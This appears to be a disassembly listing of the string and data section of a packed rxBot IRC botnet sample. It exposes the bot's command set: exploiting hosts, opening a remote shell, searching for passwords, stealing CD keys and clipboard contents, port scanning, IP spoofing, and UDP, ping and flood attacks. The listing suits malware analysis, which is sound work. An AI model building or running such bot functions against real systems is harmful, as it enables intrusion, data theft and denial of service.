aJ: ; DATA XREF: sub_401ACD+3D55�o
; UPX0:00438324�o ...
unicode 0, <j>,0
aN: ; DATA XREF: sub_401ACD+3D2B�o
; UPX0:00438344�o ...
unicode 0, <n>,0
unk_42BA4C db 2Dh ; - ; DATA XREF: sub_401ACD+3CF7�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aDisconnectingC db '- disconnecting clones...',0
align 4
aNickservRegist db 'nickserv register %s %s',0 ; DATA XREF: sub_401ACD+3C93�o
aRegister db 'register',0 ; DATA XREF: sub_401ACD+3C6A�o
align 4
aPrivmsgSS_0 db 'PRIVMSG %s :%s',0 ; DATA XREF: sub_401ACD+3C11�o
align 4
aMix db 'mix',0 ; DATA XREF: sub_401ACD+3B44�o
dword_42BAAC dd 56495250h, 2047534Dh, 3A207325h, 6E696601h, 1726567h
; DATA XREF: sub_401ACD+3AF0�o
; sub_401ACD+3B27�o
dd 0
dword_42BAC4 dd 56495250h, 2047534Dh, 3A207325h, 72657601h, 6E6F6973h
; DATA XREF: sub_401ACD+3AB9�o
dd 1
dword_42BADC dd 56495250h, 2047534Dh, 3A207325h, 6E697001h, 167h
; DATA XREF: sub_401ACD+3A82�o
; sub_401ACD+3B99�o
aCtcp db 'ctcp',0 ; DATA XREF: sub_401ACD+3A2D�o
align 4
aNoticeSS_0 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401ACD+3998�o
; sub_401ACD+39D4�o ...
align 4
aNotice_0 db 'notice',0 ; DATA XREF: sub_401ACD+393E�o
align 10h
aMsg db 'msg',0 ; DATA XREF: sub_401ACD+384F�o
aChgnick db 'chgnick',0 ; DATA XREF: sub_401ACD+3808�o
aNick_0 db 'nick',0 ; DATA XREF: sub_401ACD+3706�o
; sub_401ACD+3D16�o
align 4
dword_42BB24 dd 56495250h, 2047534Dh, 3A207325h, 43434401h, 4E455320h
; DATA XREF: sub_401ACD+36E9�o
dd 64252044h, 2064252Eh, 25206425h, 64252064h, 1
dword_42BB4C dd 636364h ; DATA XREF: sub_401ACD+366C�o
dword_42BB50 dd 6E696F6Ah, 7261702Fh, 74h ; DATA XREF: sub_401ACD+351F�o
dword_42BB5C dd 4B43494Eh, 732520h ; DATA XREF: sub_401ACD+3502�o
; sub_401ACD+3763�o ...
dword_42BB64 dd 69257325h, 0 ; DATA XREF: sub_401ACD+34E7�o
; sub_40ACB6+4F�o ...
aPnick db 'pnick',0 ; DATA XREF: sub_401ACD+34A6�o
align 4
aPartSS db 'part %s %s',0 ; DATA XREF: sub_401ACD+3489�o
; sub_401ACD+3579�o ...
align 10h
aPartflood db 'partflood',0 ; DATA XREF: sub_401ACD+3462�o
align 4
aPartS db 'part %s',0 ; DATA XREF: sub_401ACD+3445�o
aPart_0 db 'part',0 ; DATA XREF: sub_401ACD+3423�o
; sub_401ACD+3D6A�o
align 4
aJoinS db 'join %s',0 ; DATA XREF: sub_401ACD+3406�o
; sub_401ACD+354D�o ...
aJoin db 'join',0 ; DATA XREF: sub_401ACD+33E4�o
; sub_401ACD+3D40�o
align 4
aModeSS db 'mode %s %s',0 ; DATA XREF: sub_401ACD+33C7�o
align 4
aMode db 'mode',0 ; DATA XREF: sub_401ACD+3378�o
; sub_401ACD+48F2�o
align 10h
aNoticeSS_1 db 'notice %s :%s',0 ; DATA XREF: sub_401ACD+335B�o
align 10h
aNt db 'nt',0 ; DATA XREF: sub_401ACD+330C�o
align 4
dword_42BBD4 dd 76697270h, 2067736Dh, 3A207325h, 1732501h, 0
; DATA XREF: sub_401ACD+32EF�o
dword_42BBE8 dd 7463h ; DATA XREF: sub_401ACD+32A0�o
dword_42BBEC dd 76697270h, 2067736Dh, 3A207325h, 7325h ; DATA XREF: sub_401ACD+3283�o
; sub_401ACD+38A9�o ...
dword_42BBFC dd 5Fh ; DATA XREF: sub_401ACD+3254�o
; sub_401ACD+32C0�o ...
dword_42BC00 dd 6D70h ; DATA XREF: sub_401ACD+3234�o
; sub_401ACD+487F�o
unk_42BC04 db 2Dh ; - ; DATA XREF: sub_401ACD+3202�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aSClonesLoadedT db '- %s clones loaded to %s:%s',0
align 10h
aLoad db 'load',0 ; DATA XREF: sub_401ACD+31AB�o
align 4
aFlood db 'flood',0 ; DATA XREF: sub_401ACD+3182�o
align 10h
aRinms db 'rinms',0 ; DATA XREF: sub_401ACD+316B�o
align 4
aReconnect_in_m db 'reconnect.in.ms',0 ; DATA XREF: sub_401ACD+3156�o
aRin db 'rin',0 ; DATA XREF: sub_401ACD+3141�o
aReconnect_in db 'reconnect.in',0 ; DATA XREF: sub_401ACD+312C�o
align 4
unk_42BC6C db 2Dh ; - ; DATA XREF: sub_401ACD+3121�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFailedToStartE db '- Failed to start exploiter thread, error: <%d>.',0
align 4
unk_42BCAC db 2Dh ; - ; DATA XREF: sub_401ACD+30AF�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aAttemptingToCo db '- attempting to compromise %s...',0
align 4
aExploit db 'exploit',0 ; DATA XREF: sub_401ACD+3029�o
unk_42BCE4 db 2Dh ; - ; DATA XREF: sub_401ACD+300F�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofIpSetToS_ db ' Spoof IP set to ',27h,'%s',27h,'.',0
align 10h
unk_42BD10 db 2Dh ; - ; DATA XREF: sub_401ACD+2FF1�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSIsAnInvalidIp db ' ',27h,'%s',27h,' is an invalid IP address.',0
aD_D_D_ db '%d.%d.%d.*',0 ; DATA XREF: sub_401ACD+2FCD�o
align 10h
unk_42BD50 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_404A41�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingCurren db ' Spoofing currently set to ',27h,'%s',27h,'.',0
align 4
aGet db 'get',0 ; DATA XREF: sub_401ACD:loc_404A23�o
; sub_401ACD+3F62�o
unk_42BD8C db 2Dh ; - ; DATA XREF: sub_401ACD+2EDB�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aInvalidLoginSl db 'Invalid login slot number: %d.',0
align 4
unk_42BDB8 db 2Dh ; - ; DATA XREF: sub_401ACD+2ED3�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aNoUserLoggedIn db 'No user logged in at slot: %d.',0
align 4
dword_42BDE4 dd 234032Dh, 6E69616Dh, 202D0302h, 7325h ; DATA XREF: sub_401ACD+2E7E�o
unk_42BDF4 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_40493C�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aThisModOfRxbot db 'This mod of rxBot is dedicated to Pia Gerhardt (nameless@efnet/ir'
db 'cnet), the Beautiful Operatress from Heaven (or Bitch Operatress '
db 'from Hell?) who I love so much.',0
align 4
dword_42BEA4 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_401ACD+2E4C�o
aFailedToSta_19 db '- Failed to start secure thread, error: <%d>.',0
align 10h
dword_42BEE0 dd 234032Dh, 75636573h, 3026572h, 7325202Dh, 73797320h
; DATA XREF: sub_401ACD+2DD2�o
dd 2E6D6574h, 0
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_401ACD+2DCC�o
align 4
aSecuring db 'Securing',0 ; DATA XREF: sub_401ACD+2DC5�o
align 4
unk_42BF14 db 2Dh ; - ; DATA XREF: sub_401ACD+2D4E�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFailedToSta_20 db ' Failed to start server thread, error: <%d>.',0
align 4
unk_42BF54 db 2Dh ; - ; DATA XREF: sub_401ACD+2CCA�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aServerStartedO db ' Server started on: %s:%d.',0
align 10h
dword_42BF80 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_401ACD+2C48�o
aFailedToSta_21 db '- Failed to start server thread, error: <%d>.',0
align 4
dword_42BFBC dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_401ACD+2BD9�o
; sub_4111CE+A8�o
aServerStarte_0 db '- Server started on: %s:%d.',0
dword_42BFE4 dd 234032Dh, 646E6966h, 656C6966h, 2D0302h ; DATA XREF: sub_401ACD+2B26�o
dword_42BFF4 dd 646E6946h, 6C696620h, 65h ; DATA XREF: sub_401ACD+2B21�o
dword_42C000 dd 234032Dh, 636F7270h, 2D030273h, 0 ; DATA XREF: sub_401ACD+2B0E�o
dword_42C010 dd 636F7250h, 20737365h, 7473696Ch, 0 ; DATA XREF: sub_401ACD+2B09�o
dword_42C020 dd 234032Dh, 6E69616Dh, 202D0302h, 6F636552h, 63656E6Eh
; DATA XREF: sub_401ACD+2A96�o
dd 676E6974h, 2Eh
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401ACD:loc_404556�o
; sub_401ACD:loc_409779�o ...
align 4
dword_42C054 dd 234032Dh, 6E69616Dh, 202D0302h, 63736944h, 656E6E6Fh
; DATA XREF: sub_401ACD+2A74�o
dd 6E697463h, 2E67h
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401ACD:loc_404534�o
align 4
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_401ACD:loc_40451E�o
; sub_401ACD+7A7F�o
align 4
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+2A3F�o
align 4
unk_42C0A4 db 2Dh ; - ; DATA XREF: sub_401ACD+2A18�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aStatusReady_Bo db 'Status: Ready. Bot Uptime: %s.',0
align 10h
dword_42C0D0 dd 234032Dh, 6E69616Dh, 202D0302h, 20746F42h, 203A4449h
; DATA XREF: sub_401ACD+29D9�o
dd 2E7325h
unk_42C0E8 db 2Dh ; - ; DATA XREF: sub_401ACD+29CA�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToSta_22 db '- Failed to start list thread, error: <%d>.',0
align 4
dword_42C124 dd 234032Dh, 65726874h, 2736461h, 4C202D03h, 20747369h
; DATA XREF: sub_401ACD+295B�o
dd 65726874h, 2E736461h, 0
dword_42C144 dd 627573h ; DATA XREF: sub_401ACD+2935�o
dword_42C148 dd 234032Dh, 6E69616Dh, 202D0302h, 61696C41h, 696C2073h
; DATA XREF: sub_401ACD+28E3�o
dd 2E7473h
unk_42C160 db 2Dh ; - ; DATA XREF: sub_401ACD+28C8�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedToSta_23 db '- Failed to start listing thread, error: <%d>.',0
dword_42C198 dd 234032Dh, 2676F6Ch, 4C202D03h, 69747369h, 6C20676Eh
; DATA XREF: sub_401ACD+2859�o
dd 2E676Fh
dword_42C1B0 dd 234032Dh, 6E69616Dh, 202D0302h, 7774654Eh, 206B726Fh
; DATA XREF: sub_401ACD+27B4�o
dd 6F666E49h, 2Eh
dword_42C1CC dd 234032Dh, 6E69616Dh, 202D0302h, 74737953h, 49206D65h
; DATA XREF: sub_401ACD+2785�o
dd 2E6F666Eh, 0
dword_42C1E8 dd 234032Dh, 6E69616Dh, 202D0302h, 6F6D6552h, 676E6976h
; DATA XREF: sub_401ACD+2730�o
dd 746F4220h, 2Eh
unk_42C204 db 2Dh ; - ; DATA XREF: sub_401ACD+2714�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToSta_24 db ' Failed to start listing thread, error: <%d>.',0
align 10h
dword_42C240 dd 234032Dh, 636F7270h, 2D030273h, 6F725020h, 73656363h
; DATA XREF: sub_401ACD+269F�o
dd 696C2073h, 2E7473h
aFull db 'full',0 ; DATA XREF: sub_401ACD+267F�o
align 4
unk_42C264 db 2Dh ; - ; DATA XREF: sub_401ACD+261D�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aAlreadyRunni_3 db ' Already running.',0
align 4
dword_42C284 dd 234032Dh, 656B6463h, 3027379h ; DATA XREF: sub_401ACD+25FA�o
aSearchComplete db '- Search completed.',0
dword_42C2A4 dd 234032Dh, 6E69616Dh, 202D0302h, 69747055h, 203A656Dh
; DATA XREF: sub_401ACD+25AE�o
dd 2E7325h
unk_42C2BC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403FEB�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellRea db '- Remote shell ready.',0
align 4
unk_42C2DC db 2Dh ; - ; DATA XREF: sub_401ACD+2514�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldnTOpenRem db '- Couldn',27h,'t open remote shell.',0
align 4
unk_42C304 db 2Dh ; - ; DATA XREF: sub_401ACD+24F5�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellAlr db '- Remote shell already running.',0
align 10h
dword_42C330 dd 234032Dh, 6E69616Dh, 202D0302h, 20746547h, 70696C43h
; DATA XREF: sub_401ACD+24DF�o
dd 72616F62h, 2E64h
dword_42C34C dd 234032Dh, 70696C63h, 72616F62h, 61642064h, 3026174h
; DATA XREF: sub_401ACD+24B1�o
dd 2Dh
unk_42C364 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403F6E�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushA db 'Failed to flush ARP cache.',0
align 10h
unk_42C390 db 2Dh ; - ; DATA XREF: sub_401ACD+249A�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheFlushe db 'ARP cache flushed.',0
align 4
unk_42C3B4 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403F43�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToLoadDn db 'Failed to load dnsapi.dll.',0
align 10h
unk_42C3E0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403F3C�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushD db 'Failed to flush DNS cache.',0
align 4
unk_42C40C db 2Dh ; - ; DATA XREF: sub_401ACD+2468�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aDnsCacheFlushe db 'DNS cache flushed.',0
align 10h
unk_42C430 db 2Dh ; - ; DATA XREF: sub_401ACD+2415�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToSta_25 db '- Failed to start server thread, error: <%d>.',0
align 4
unk_42C46C db 2Dh ; - ; DATA XREF: sub_401ACD+23A6�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aServerListenin db '- Server listening on IP: %s:%d, Username: %s.',0
unk_42C4A8 db 2Dh ; - ; DATA XREF: sub_401ACD+22C0�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_26 db ' Failed to start server thread, error: <%d>.',0
align 4
unk_42C4E4 db 2Dh ; - ; DATA XREF: sub_401ACD+2255�o
; sub_40BACE+449�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerListen_0 db ' Server listening on IP: %s:%d, Directory: %s\.',0
unk_42C520 db 2Dh ; - ; DATA XREF: sub_401ACD+214E�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_27 db ' Failed to start server thread, error: <%d>.',0
align 4
unk_42C55C db 2Dh ; - ; DATA XREF: sub_401ACD+20DF�o
; sub_40BACE+DA�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aServerStarte_1 db ' Server started on Port: %d, File: %s.',0
align 10h
unk_42C590 db 2Dh ; - ; DATA XREF: sub_401ACD+202A�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aAlreadyRunni_4 db ' Already running.',0
align 10h
unk_42C5B0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403AE1�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToSta_28 db '- Failed to start scan, port is invalid.',0
align 4
unk_42C5E8 db 2Dh ; - ; DATA XREF: sub_401ACD+1FC4�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToSta_29 db '- Failed to start scan thread, error: <%d>.',0
align 4
unk_42C624 db 2Dh ; - ; DATA XREF: sub_401ACD+1F53�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aSPortScanSta_0 db '- %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
align 10h
aSequential db 'Sequential',0 ; DATA XREF: sub_401ACD+1F28�o
; sub_401ACD+5BEF�o
align 4
aRandom db 'Random',0 ; DATA XREF: sub_401ACD+1F21�o
; sub_401ACD+5BE8�o
align 4
unk_42C6A4 db 2Dh ; - ; DATA XREF: sub_401ACD+1D6E�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aAlreadyDScan_0 db '- Already %d scanning threads. Too many specified.',0
unk_42C6E4 db 2Dh ; - ; DATA XREF: sub_401ACD+1D10�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToSta_30 db 'Failed to start search thread, error: <%d>.',0
unk_42C720 db 2Dh ; - ; DATA XREF: sub_401ACD+1C96�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aSearchingForPa db 'Searching for password.',0
aFp db 'fp',0 ; DATA XREF: sub_401ACD+1C4D�o
align 4
aFindpass db 'findpass',0 ; DATA XREF: sub_401ACD+1C3C�o
align 4
aNoticeSPhoning db 'NOTICE %s :PHONING HOME: hi ;).',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+1C29�o
align 4
aPhonehome db 'phonehome',0 ; DATA XREF: sub_401ACD+1C12�o
align 4
aAsc db 'asc',0 ; DATA XREF: sub_401ACD+1BE8�o
dword_42C78C dd 234032Dh, 6E69616Dh, 202D0302h, 73617243h, 676E6968h
; DATA XREF: sub_401ACD+1B98�o
dd 746F6220h, 2Eh
aCrash db 'crash',0 ; DATA XREF: sub_401ACD+1B82�o
; sub_401ACD+1BD2�o
align 10h
aTftp db 'tftp',0 ; DATA XREF: sub_401ACD+1B6D�o
align 4
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_401ACD+1B58�o
align 4
aHttp db 'http',0 ; DATA XREF: sub_401ACD+1B43�o
align 4
aHttpserver db 'httpserver',0 ; DATA XREF: sub_401ACD+1B2E�o
align 4
aRlogin db 'rlogin',0 ; DATA XREF: sub_401ACD+1B19�o
align 10h
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_401ACD+1B04�o
align 10h
aCip db 'cip',0 ; DATA XREF: sub_401ACD+1AEF�o
aCurrentip db 'currentip',0 ; DATA XREF: sub_401ACD+1ADA�o
align 10h
aFdns db 'fdns',0 ; DATA XREF: sub_401ACD+1AC5�o
align 4
aFlushdns db 'flushdns',0 ; DATA XREF: sub_401ACD+1AB0�o
align 4
aFarp db 'farp',0 ; DATA XREF: sub_401ACD+1A9B�o
align 4
aFlusharp db 'flusharp',0 ; DATA XREF: sub_401ACD+1A86�o
align 4
aGc db 'gc',0 ; DATA XREF: sub_401ACD+1A71�o
align 4
aGetclip db 'getclip',0 ; DATA XREF: sub_401ACD+1A5C�o
unk_42C834 db 2Dh ; - ; DATA XREF: sub_401ACD+1A1E�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingDisabl db ' Spoofing disabled.',0
aOff db 'off',0 ; DATA XREF: sub_401ACD+1A03�o
; sub_401ACD+3CB0�o ...
aSpoof db 'spoof',0 ; DATA XREF: sub_401ACD+19EC�o
align 4
unk_42C868 db 2Dh ; - ; DATA XREF: sub_401ACD+19CE�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aLoginListCompl db 'Login list complete.',0
align 4
aD_S db '%d. %s',0 ; DATA XREF: sub_401ACD+1996�o
; sub_40B1B4+46�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_401ACD:loc_403454�o
dword_42C89C dd 234032Dh, 69676F6Ch, 696C206Eh, 3027473h, 2Dh
; DATA XREF: sub_401ACD+195C�o
dword_42C8B0 dd 6F6877h ; DATA XREF: sub_401ACD+193F�o
dword_42C8B4 dd 234032Dh, 2646D63h, 2D03h ; DATA XREF: sub_401ACD+1934�o
dword_42C8C0 dd 6F6D6552h, 73206574h, 6C6C6568h, 0 ; DATA XREF: sub_401ACD+192F�o
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_401ACD+1916�o
aOcmd db 'ocmd',0 ; DATA XREF: sub_401ACD+1901�o
align 10h
aOpencmd db 'opencmd',0 ; DATA XREF: sub_401ACD+18EC�o
aDll db 'dll',0 ; DATA XREF: sub_401ACD+18D7�o
aTestdlls db 'testdlls',0 ; DATA XREF: sub_401ACD+18C2�o
align 4
aDrv db 'drv',0 ; DATA XREF: sub_401ACD+18AD�o
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_401ACD+1898�o
align 4
aUp db 'up',0 ; DATA XREF: sub_401ACD+1883�o
align 4
aUptime db 'uptime',0 ; DATA XREF: sub_401ACD+186E�o
align 4
aKey db 'key',0 ; DATA XREF: sub_401ACD+1859�o
aGetcdkeys db 'getcdkeys',0 ; DATA XREF: sub_401ACD+1844�o
align 4
aPs db 'ps',0 ; DATA XREF: sub_401ACD+182F�o
align 4
aProcs db 'procs',0 ; DATA XREF: sub_401ACD+181A�o
align 10h
aLsp100 db 'lsp100',0 ; DATA XREF: sub_401ACD+17F0�o
; sub_401ACD+1805�o
align 4
aSi db 'si',0 ; DATA XREF: sub_401ACD+17DB�o
align 4
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_401ACD+17C6�o
aNi db 'ni',0 ; DATA XREF: sub_401ACD+17B1�o
align 4
aNetinfo db 'netinfo',0 ; DATA XREF: sub_401ACD+179C�o
aClg db 'clg',0 ; DATA XREF: sub_401ACD+1787�o
aClearlog db 'clearlog',0 ; DATA XREF: sub_401ACD+1772�o
align 10h
aLg db 'lg',0 ; DATA XREF: sub_401ACD+175D�o
align 4
aLog db 'log',0 ; DATA XREF: sub_401ACD+1748�o
aAl db 'al',0 ; DATA XREF: sub_401ACD+1733�o
align 4
aAliases db 'aliases',0 ; DATA XREF: sub_401ACD+171E�o
aT: ; DATA XREF: sub_401ACD+1709�o
; UPX0:004382F8�o ...
unicode 0, <t>,0
aThreads db 'threads',0 ; DATA XREF: sub_401ACD+16F4�o
unk_42C980 db 2Dh ; - ; DATA XREF: sub_401ACD+16C0�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToReboot db 'Failed to reboot system.',0
align 4
unk_42C9A8 db 2Dh ; - ; DATA XREF: sub_401ACD+16B9�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRebootingSyste db 'Rebooting system.',0
align 4
aReboot db 'reboot',0 ; DATA XREF: sub_401ACD+16A2�o
align 10h
aI: ; DATA XREF: sub_401ACD+168D�o
; UPX0:00438304�o ...
unicode 0, <i>,0
aId db 'id',0 ; DATA XREF: sub_401ACD+1678�o
align 4
aS_1: ; DATA XREF: sub_401ACD+1663�o
; UPX0:00438310�o ...
unicode 0, <s>,0
aStatus db 'status',0 ; DATA XREF: sub_401ACD+164E�o
align 4
aQ: ; DATA XREF: sub_401ACD+1639�o
; UPX0:off_4382E8�o ...
unicode 0, <q>,0
aQuit_0 db 'quit',0 ; DATA XREF: sub_401ACD+1624�o
align 10h
aDc db 'dc',0 ; DATA XREF: sub_401ACD+160F�o
align 4
aDisconnect db 'disconnect',0 ; DATA XREF: sub_401ACD+15FA�o
align 10h
aR: ; DATA XREF: sub_401ACD+15E5�o
; sub_401ACD+3DA9�o ...
unicode 0, <r>,0
aReconnect db 'reconnect',0 ; DATA XREF: sub_401ACD+15D0�o
align 10h
aExplist db 'explist',0 ; DATA XREF: sub_401ACD+15BB�o
aExploitlist db 'exploitlist',0 ; DATA XREF: sub_401ACD+15A6�o
aCbstats db 'cbstats',0 ; DATA XREF: sub_401ACD+1591�o
aConnectbacksta db 'connectbackstats',0 ; DATA XREF: sub_401ACD+157C�o
align 10h
aTrstats db 'trstats',0 ; DATA XREF: sub_401ACD+1567�o
aTransferstats db 'transferstats',0 ; DATA XREF: sub_401ACD+1552�o
align 4
aStats db 'stats',0 ; DATA XREF: sub_401ACD+153D�o
align 10h
aScanstats db 'scanstats',0 ; DATA XREF: sub_401ACD+1528�o
align 4
dword_42CA6C dd 234032Dh, 6E616373h, 2D0302h ; DATA XREF: sub_401ACD+151D�o
aScan_0 db 'Scan',0 ; DATA XREF: sub_401ACD+1518�o
align 10h
aScanstop db 'scanstop',0 ; DATA XREF: sub_401ACD+14FF�o
align 4
dword_42CA8C dd 234032Dh, 75636573h, 3026572h, 2Dh ; DATA XREF: sub_401ACD+14F4�o
aSecure_0 db 'Secure',0 ; DATA XREF: sub_401ACD+14EF�o
align 4
aSecurestop db 'securestop',0 ; DATA XREF: sub_401ACD+14D6�o
align 10h
dword_42CAB0 dd 234032Dh, 6E6F6C63h, 3027365h, 2Dh ; DATA XREF: sub_401ACD+14CB�o
aClone db 'Clone',0 ; DATA XREF: sub_401ACD+14C6�o
align 4
aClonestop db 'clonestop',0 ; DATA XREF: sub_401ACD+14AD�o
align 4
aPsstop db 'psstop',0 ; DATA XREF: sub_401ACD+1498�o
align 4
aProcsstop db 'procsstop',0 ; DATA XREF: sub_401ACD+1483�o
align 4
aFfstop db 'ffstop',0 ; DATA XREF: sub_401ACD+146E�o
align 10h
aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_401ACD+1459�o
align 10h
dword_42CB00 dd 234032Dh, 70746674h, 2D030264h, 0 ; DATA XREF: sub_401ACD+144E�o
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_401ACD+1430�o
align 4
aPingstop db 'pingstop',0 ; DATA XREF: sub_401ACD+1407�o
align 4
aUdpstop db 'udpstop',0 ; DATA XREF: sub_401ACD+13DE�o
aWisdomstop db 'wisdomstop',0 ; DATA XREF: sub_401ACD+13B5�o
align 4
aTsunamistop db 'tsunamistop',0 ; DATA XREF: sub_401ACD+138C�o
unk_42CB48 db 2Dh ; - ; DATA XREF: sub_401ACD+1372�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aAllPacketingAc db 'All packeting activity has been halted.',0
dword_42CB7C dd 234032Dh, 64736977h, 3026D6Fh, 2Dh ; DATA XREF: sub_401ACD+1337�o
; sub_401ACD+13D3�o
dword_42CB8C dd 64736957h, 61206D6Fh, 63617474h, 6Bh ; DATA XREF: sub_401ACD+1332�o
; sub_401ACD+13CE�o
dword_42CB9C dd 234032Dh, 6E757374h, 2696D61h, 2D03h ; DATA XREF: sub_401ACD+1319�o
; sub_401ACD+13AA�o
dword_42CBAC dd 6E757354h, 20696D61h, 6F6F6C66h, 64h ; DATA XREF: sub_401ACD+1314�o
; sub_401ACD+13A5�o
dword_42CBBC dd 234032Dh, 676E6970h, 2D0302h ; DATA XREF: sub_401ACD+12B9�o
; sub_401ACD+1425�o
